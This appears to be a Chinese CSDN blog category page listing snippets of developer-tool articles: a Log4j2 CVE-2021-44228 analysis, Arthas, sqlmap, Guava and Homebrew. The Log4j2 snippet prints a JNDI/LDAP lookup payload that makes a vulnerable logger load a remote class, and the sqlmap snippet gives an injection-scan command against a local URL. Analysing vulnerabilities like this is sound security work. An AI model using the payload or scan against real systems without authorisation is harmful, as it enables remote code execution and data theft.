![](https://img-blog.csdnimg.cn/20201014180756927.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
工具
文章平均质量分 56
每年进步一点点
这个作者很懒,什么都没留下…
展开
-
Log4j2远程代码执行漏洞分析及例子
0x00 介绍Log4j2是Java开发常用的日志框架,该漏洞触发条件低,危害大,由阿里云安全团队报告(莫羽师傅挖到的)分配CVE编号:CVE-2021-44228CVSS评分:10.0(最高只能10分)POC比较简单public static void main(String[] args) throws Exception { logger.error("${jndi:ldap://127.0.0.1:1389/badClassName}");}POC虽然简单,但是转载 2021-12-11 17:35:12 · 1359 阅读 · 1 评论 -
Althas动态修改类
Althas动态加载类原创 2021-12-07 10:35:55 · 1226 阅读 · 0 评论 -
sqlmap-sql注入检测
SqlMap(防sql注入)使用手册下载地址:Download and update · sqlmapproject/sqlmap Wiki · GitHub下载后无须安装依赖:需要有python2.6, 2.7or 3.x的使用:在sqlmap的目录下 ,使用 python sqlmap.py -u http://localhost:8080/api/testSqlInjectWithCompile?phone=18810652812-u表示要测试的url出现...原创 2021-10-15 12:07:02 · 2138 阅读 · 0 评论 -
一些值得记录的工具类
注:仅仅作为自己记录使用guavaMultimap 一个key可以映射多个value的HashMap,多省事,多简洁,省得你再创建 Map<String, List>Multimap<String,Integer>map=ArrayListMultimap.create();map.put("key",1);map.put("key",2);Collection<Integer>values=map.get("key");...原创 2021-06-30 10:36:50 · 80 阅读 · 0 评论 -
Mac 安装brew及使用
通过官网下载brew时,要么是超时,要么是拒绝连接,困扰了好一会,突然看到一篇文档,通过镜像加速访问和下载,感觉挺有用,所以转过来,记录一下。Homebrew是一款包管理工具,目前支持macOS和linux系统。主要有四个部分组成:brew、homebrew-core、homebrew-cask、homebrew-bottles。本文主要介绍Homebrew安装方式以及如何加速访问,顺便普及一些必要的知识。1. 脚本说明Homebrew默认安装脚本:/usr/bin/ruby ..原创 2020-08-10 18:45:51 · 290 阅读 · 0 评论